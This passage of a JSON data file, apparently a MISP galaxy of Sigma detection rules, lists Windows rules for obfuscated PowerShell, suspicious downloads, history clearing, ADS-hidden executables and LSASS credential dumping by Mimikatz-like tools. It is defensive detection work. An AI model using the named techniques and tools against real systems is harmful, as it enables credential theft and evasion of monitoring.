"767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", "value": "Malicious PowerShell Commandlets - PoshModule" }, { "description": "Detects suspicious PowerShell download command", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-05", "falsepositive": [ "PowerShell scripts that download content from the Internet" ], "filename": "posh_pm_susp_download.yml", "level": "medium", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0", "https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "de41232e-12e8-49fa-86bc-c05c7e722df9", "value": "Suspicious PowerShell Download - PoshModule" }, { "description": "Detects suspicious PowerShell invocation command parameters", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "creation_date": "2017-03-05", "falsepositive": [ "Unknown" ], "filename": "posh_pm_susp_invocation_specific.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "value": "Suspicious PowerShell Invocations - Specific - PowerShell Module" }, { "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_var.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module" }, { "description": "Detects remote PowerShell sessions", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "creation_date": "2019-08-10", "falsepositive": [ "Legitimate use remote PowerShell sessions" ], "filename": "posh_pm_remote_powershell_session.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_remote_powershell_session.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.lateral-movement", "attack.t1021.006" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "96b9f619-aa91-478f-bacb-c3e50f8df575", "value": "Remote PowerShell Session (PS Module)" }, { "description": "Detects Obfuscated Powershell via Stdin in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_via_stdin.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", "value": "Invoke-Obfuscation Via Stdin - PowerShell Module" }, { "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", "meta": { "author": "Ensar Şamil, @sblmsrsn, OSCD Community", "creation_date": "2020-10-05", "falsepositive": [ "App-V clients" ], "filename": "posh_pm_syncappvpublishingserver_exe.yml", "level": "medium", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", "value": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module" }, { "description": "Detects suspicious PowerShell invocation command parameters", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-12", "falsepositive": [ "Very special / sneaky PowerShell scripts" ], "filename": "posh_pm_susp_invocation_generic.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", "value": "Suspicious PowerShell Invocations - Generic - PowerShell Module" }, { "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads\nthat often undergo minimal changes by attackers due to bad opsec.\n", "meta": { "author": "ok @securonix invrep_de, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." ], "filename": "posh_pm_bad_opsec_artifacts.yml", "level": "critical", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://www.mdeditor.tw/pl/pgRt", "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", "value": "Bad Opsec Powershell Code Artifacts" }, { "description": "Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\nAn adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2021-07-20", "falsepositive": [ "Unknown" ], "filename": "posh_pm_susp_zip_compress.yml", "level": "medium", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_zip_compress.yml" ], "tags": [ "attack.collection", "attack.t1074.001" ] }, "related": [ { "dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "daf7eb81-35fd-410d-9d7a-657837e602bb", "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module" }, { "description": "Detects keywords that could indicate clearing PowerShell history", "meta": { "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_pm_clear_powershell_history.yml", "level": "medium", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_clear_powershell_history.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.003" ] }, "related": [ { "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f99276ad-d122-4989-a09a-d00904a5f9d2", "value": "Clear PowerShell History - PowerShell Module" }, { "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_via_var.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module" }, { "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", "meta": { "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "creation_date": "2019-11-08", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2f211361-7dce-442d-b78a-c04039677378", "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module" }, { "description": "Detects Obfuscated use of stdin to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_stdin.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "value": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module" }, { "description": "A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "Unknown" ], "filename": "posh_pm_get_clipboard.yml", "level": "medium", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.md", "https://github.com/OTRF/detection-hackathon-apt29/issues/16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml" ], "tags": [ "attack.collection", "attack.t1115" ] }, "related": [ { "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", "value": "PowerShell Get Clipboard" }, { "description": "Detects the download of a file with a potentially suspicious extension from a .zip top level domain.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2023-05-18", "falsepositive": [ "Legitimate file downloads from a websites and web services that uses the \".zip\" top level domain." ], "filename": "create_stream_hash_zip_tld_download.yml", "level": "high", "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ "https://twitter.com/cyb3rops/status/1659175181695287297", "https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_zip_tld_download.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "0bb4bbeb-fe52-4044-b40c-430a04577ebe", "value": "Potentially Suspicious File Download From ZIP TLD" }, { "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-24", "falsepositive": [ "Unknown" ], "filename": "create_stream_hash_file_sharing_domains_download_unusual_extension.yml", "level": "medium", "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml" ], "tags": [ "attack.defense-evasion", "attack.s0139", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", "value": "Unusual File Download From File Sharing Websites - File Stream" }, { "description": "Detects the creation of a named file stream with the imphash of a well-known hack tool", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-24", "falsepositive": [ "Unknown" ], "filename": "create_stream_hash_hktl_generic_download.yml", "level": "high", "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ "https://github.com/outflanknl/Dumpert", "https://github.com/topotam/PetitPotam", "https://github.com/antonioCoco/RoguePotato", "https://github.com/codewhitesec/HandleKatz", "https://github.com/gentilkiwi/mimikatz", "https://github.com/fortra/nanodump", "https://github.com/xuanxuan0/DripLoader", "https://github.com/ohpe/juicy-potato", "https://github.com/wavestone-cdt/EDRSandblast", "https://github.com/hfiref0x/UACME", "https://www.tarasco.org/security/pwdump_7/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_hktl_generic_download.yml" ], "tags": [ "attack.defense-evasion", "attack.s0139", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "19b041f6-e583-40dc-b842-d6fa8011493f", "value": "HackTool Named File Stream Created" }, { "description": "Detects potential suspicious winget package installation from a suspicious source.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-18", "falsepositive": [ "Unknown" ], "filename": "create_stream_hash_winget_susp_package_source.yml", "level": "high", "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_winget_susp_package_source.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence" ] }, "uuid": "a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", "value": "Potential Suspicious Winget Package Installation" }, { "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", "meta": { "author": "frack113", "creation_date": "2022-10-22", "falsepositive": [ "Other legitimate browsers not currently included in the filter (please add them)", "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" ], "filename": "create_stream_hash_creation_internet_file.yml", "level": "medium", "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_creation_internet_file.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "573df571-a223-43bc-846e-3f98da481eca", "value": "Creation Of a Suspicious ADS File Outside a Browser Download" }, { "description": "Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash", "meta": { "author": "Florian Roth (Nextron Systems), @0xrawsec", "creation_date": "2018-06-03", "falsepositive": [ "This rule isn't looking for any particular binary characteristics. As legitimate installers and programs were seen embedding hidden binaries in their ADS. Some false positives are expected from browser processes and similar." ], "filename": "create_stream_hash_ads_executable.yml", "level": "medium", "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ "https://twitter.com/0xrawsec/status/1002478725605273600?s=21", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml" ], "tags": [ "attack.defense-evasion", "attack.s0139", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b69888d4-380c-45ce-9cf9-d9ce46e67821", "value": "Hidden Executable In NTFS Alternate Data Stream" }, { "description": "Exports the target Registry key and hides it in the specified alternate data stream.", "meta": { "author": "Oddvar Moe, Sander Wiebing, oscd.community", "creation_date": "2020-10-07", "falsepositive": [ "Unknown" ], "filename": "create_stream_hash_regedit_export_to_ads.yml", "level": "high", "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", "value": "Exports Registry Key To an Alternate Data Stream" }, { "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-24", "falsepositive": [ "Some false positives might occur with binaries download via Github" ], "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml", "level": "high", "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", "https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml" ], "tags": [ "attack.defense-evasion", "attack.s0139", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "52182dfb-afb7-41db-b4bc-5336cb29b464", "value": "Suspicious File Download From File Sharing Websites - File Stream" }, { "description": "Detects the download of suspicious file type from URLs with IP", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "creation_date": "2022-09-07", "falsepositive": [ "Unknown" ], "filename": "create_stream_hash_susp_ip_domains.yml", "level": "high", "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ "https://labs.withsecure.com/publications/detecting-onenote-abuse", "https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "025bd229-fd1f-4fdb-97ab-20006e1a5368", "value": "Unusual File Download from Direct IP Address" }, { "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-09-07", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_hktl_sysmonente.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://github.com/codewhitesec/SysmonEnte/", "https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html", "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_sysmonente.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", "value": "HackTool - SysmonEnte Execution" }, { "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", "meta": { "author": "Nik Seetharaman", "creation_date": "2018-07-16", "falsepositive": [ "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "filename": "proc_access_win_cmstp_execution_by_access.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cmstp_execution_by_access.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.003", "attack.execution", "attack.t1559.001", "attack.g0069", "attack.g0080", "car.2019-04-001" ] }, "related": [ { "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3b4b232a-af90-427c-a22f-30b0c0837b95", "value": "CMSTP Execution Process Access" }, { "description": "Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.", "meta": { "author": "Bhabesh Raj, Jonhnathan Ribeiro", "creation_date": "2023-11-27", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_lsass_python_based_tool.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://twitter.com/bh4b3sh/status/1303674603819081728", "https://github.com/skelsec/pypykatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_python_based_tool.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.s0349" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f8be3e82-46a3-4e4e-ada5-8e538ae8b9c9", "value": "Credential Dumping Activity By Python Based Tool" }, { "description": "Detects process access requests to the LSASS process with specific call trace calls and access masks.\nThis behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.\n", "meta": { "author": "Samir Bousseaden, Michael Haag", "creation_date": "2019-04-03", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_lsass_memdump.yml", "level": "medium", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230329170326/https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.s0002" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", "value": "Potential Credential Dumping Activity Via LSASS" }, { "description": "Detects potential calls to NtOpenProcess directly from NTDLL.", "meta": { "author": "Christian Burkard (Nextron Systems), Tim Shelton (FP)", "creation_date": "2021-07-28", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_susp_direct_ntopenprocess_call.yml", "level": "medium", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_direct_ntopenprocess_call.yml" ], "tags": [ "attack.execution", "attack.t1106" ] }, "related": [ { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3f3f3506-1895-401b-9cc3-e86b16e630d0", "value": "Potential Direct Syscall of NtOpenProcess" }, { 